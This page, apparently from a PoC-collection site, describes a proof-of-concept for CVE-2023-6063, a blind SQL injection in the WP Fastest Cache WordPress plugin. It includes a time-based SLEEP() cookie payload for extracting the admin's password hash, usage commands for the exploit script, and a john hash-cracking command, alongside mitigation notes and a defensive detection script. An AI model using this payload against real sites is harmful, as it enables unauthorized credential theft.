Related vulnerability
Title:
WordPress plugin WP Fastest Cache security vulnerability
(CVE-2023-6063)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP; it supports hosting a personal blog on a server running PHP and MySQL. A WordPress plugin is an application add-on. WordPress plugin WP Fastest Cache versions before 1.2.2 contain a security vulnerability: a parameter is not properly sanitized and escaped before it is used in an SQL statement, which allows an unauthenticated user to perform SQL injection.
Description
A proof of concept for CVE-2023-6063, a time-based blind SQL injection vulnerability in WP Fastest Cache ≤1.2.2.
Introduction
# PoC for CVE-2023-6063: WP Fastest Cache 1.2.2 Unauthenticated Blind SQL Injection
A proof of concept for CVE-2023-6063, a time-based blind SQL injection vulnerability in WP Fastest Cache ≤1.2.2. It extracts hashed passwords (`user_pass`) and email addresses (`user_email`) from the `wp_users` table by abusing the `wordpress_logged_in` cookie.
## Features
- Time-based data exfiltration (char-by-char) via SLEEP() delays.
- Supports custom cookies, target usernames, and hash validation.
- CLI arguments for flexible testing (--just-hash, --just-email, --debug).

This script extracts:
- ☑️ WordPress password hashes (MD5/PHPass).
- ☑️ Associated email addresses.
### Usage
Install the dependencies (if they are not already installed):
~~~ bash
pip install -r requirements.txt
~~~
Basic usage:
~~~ bash
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
~~~
Full options:
~~~ text
-h, --help            show this help message and exit
-u URL, --url URL     Full URL to Wordpress for testing CVE-2023-6063
--username USERNAME   Define a user to extract its hashed pass
-d DELAY, --delay DELAY
                      Time for wait web response default 5, minimum 2
-H HASH, --hash HASH  Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
--domain DOMAIN       Name of the domain for email validation
-c COOKIE, --cookie COOKIE
                      Specify a cookie name if it's different on your context
--status-code STATUS_CODE
                      Use a specific positive status code, default 200
--debug               More verbosity
--just-hash           Just extract hashed password
--just-email          Just extract email value for a user
~~~
## 💻 Demo
This is a demo run against the admin user:
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
Once the password hashes are leaked, they can be cracked with `john` or `hashcat` using the `PHPass` format, provided the password itself is weak.
John example:
~~~ bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
~~~
# 🕵️‍♂️ Technical Details
## 📖 Vulnerability Description
The WP Fastest Cache plugin (≤1.2.2) for WordPress is vulnerable to an unauthenticated blind SQL injection via the `wordpress_logged_in` cookie. Attackers can exploit this flaw to extract sensitive data (e.g., password hashes, email addresses) from the `wp_users` table by leveraging time-based delays (SLEEP()) in SQL queries.
~~~ sql
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
~~~
🚨 Disclaimer: Use this information only for ethical security testing with proper authorization. Unauthorized exploitation is illegal.
- CVE ID: CVE-2023-6063
- Vulnerability Score: 7.5 (High)
- Vulnerability Type: SQL Injection (Blind, Time-Based)
- Affected Software: WP Fastest Cache (WordPress Plugin) ≤ v1.2.2
## 🔍 Attack Vector
- Exploitability: Remote (No authentication required)
- Attack Complexity: Low (Exploitable via crafted HTTP requests)
## 🔥 Impact
- Confidentiality: High (Leaks admin credentials)
- Integrity: None
- Availability: None
## 📌 Affected Versions
- WP Fastest Cache versions ≤1.2.2
## 🛡️ Mitigation
Upgrade WP Fastest Cache to a version later than 1.2.2.
- Upgrade to WP Fastest Cache v1.2.3 or later.
- Apply WAF rules to block SQLi payloads in cookies.
- **Disable the plugin if unused.**
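The WAF-rule mitigation above is easier to reason about with a concrete detector. The following Python snippet is an added example written for this page; it is not part of the PoC repository and not code from the plugin. It parses a raw `Cookie` header, URL-decodes each value, and flags any `wordpress_logged_in*` cookie whose value matches at least two time-based SQL injection heuristics (a quote followed by `AND`/`OR`, a `SLEEP()` or `BENCHMARK()` call, a trailing comment terminator). A second, independent signal is response latency: a request that carries the cookie and takes longer than the configured threshold is reported as well, because a successful time-based probe shows up as an unusually slow response. The request records, field names (`ip`, `duration_ms`, `cookie`) and the `slow_ms` threshold are assumptions made for the example; the sample records are constructed, not real traffic.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Heuristics for time-based blind SQL injection in a cookie value. Each one
# alone is weak (a legitimate value may contain a stray quote); the detector
# below requires at least two of them to fire on the same value.
SQLI_TIME_PATTERNS = [
    re.compile(r"""["']\s*(?:AND|OR)\b""", re.IGNORECASE),   # quote then boolean
    re.compile(r"\bSLEEP\s*\(", re.IGNORECASE),             # MySQL time delay
    re.compile(r"\bBENCHMARK\s*\(", re.IGNORECASE),         # CPU-bound delay
    re.compile(r"--\s*-?$|/\*.*\*/|#\s*$"),                 # comment terminator
]


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split a raw Cookie header into name -> URL-decoded value."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        if "=" not in part:
            continue
        name, _, value = part.strip().partition("=")
        cookies[name.strip()] = unquote(value)
    return cookies


def suspicious_logged_in_cookies(header: str) -> List[str]:
    """Return the names of wordpress_logged_in* cookies whose decoded value
    matches at least two injection heuristics."""
    flagged: List[str] = []
    for name, value in parse_cookie_header(header).items():
        if not name.startswith("wordpress_logged_in"):
            continue
        hits = sum(1 for pattern in SQLI_TIME_PATTERNS if pattern.search(value))
        if hits >= 2:
            flagged.append(name)
    return flagged


def scan_requests(records: List[dict], slow_ms: int = 2000
                  ) -> List[Tuple[str, Optional[str], str]]:
    """Scan request records (assumed fields: ip, duration_ms, cookie) and
    return (client ip, cookie name or None, reason) findings."""
    findings: List[Tuple[str, Optional[str], str]] = []
    for record in records:
        for name in suspicious_logged_in_cookies(record["cookie"]):
            findings.append((record["ip"], name, "sqli-pattern"))
        # Latency signal: a slow response while the logged-in cookie is present
        if record["duration_ms"] >= slow_ms and "wordpress_logged_in" in record["cookie"]:
            findings.append((record["ip"], None, "slow-response"))
    return findings


# Constructed sample records (not real traffic). The second one carries the
# page's SLEEP(5) payload URL-encoded inside the wordpress_logged_in cookie.
SAMPLE_REQUESTS = [
    {"ip": "203.0.113.10", "duration_ms": 120,
     "cookie": "wordpress_logged_in_7f3a=admin%7C1700000000%7Cabc123%7Cdef456; "
               "wp-settings-time-1=1699999999"},
    {"ip": "198.51.100.7", "duration_ms": 5060,
     "cookie": "wordpress_logged_in_7f3a=%22%20AND%20(IF((SELECT%20user_pass%20FROM"
               "%20wp_users%20WHERE%20user_login%3D%22admin%22)%20LIKE%20'a%25'%2C"
               "%20SLEEP(5)%2C%200))--%20-"},
    {"ip": "192.0.2.55", "duration_ms": 90,
     "cookie": "wp-settings-1=editor%3Dtinymce; PHPSESSID=abc'123"},
]


if __name__ == "__main__":
    for ip, cookie_name, reason in scan_requests(SAMPLE_REQUESTS):
        print(f"{ip}\t{cookie_name}\t{reason}")
```

A legitimate `wordpress_logged_in` value has the shape `user|expiry|token|hmac` and matches none of the patterns, so the first record is silent; the third record's stray quote sits in an unrelated cookie and is ignored. Only the second record is reported, once for the payload and once for the five-second response time, which is the pairing a WAF or SIEM rule for this CVE should look for.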
## 📚 References
- [NIST NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2023-6063)
- [WordPress Plugin Advisory](https://wordpress.org/plugins/wp-fastest-cache/)
- [CVE Details](https://www.cvedetails.com/cve/CVE-2023-6063/)
## ⚖️ Legal
- This script is for educational purposes. Always obtain explicit permission before testing.
File snapshot
[4.0K] /data/pocs/e715c2dfe6977c9dfdb0f0c55f13db48cb54c6a2
├── [ 15K] poc.py
├── [3.9K] README.md
└── [ 18] requirements.txt
0 directories, 3 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.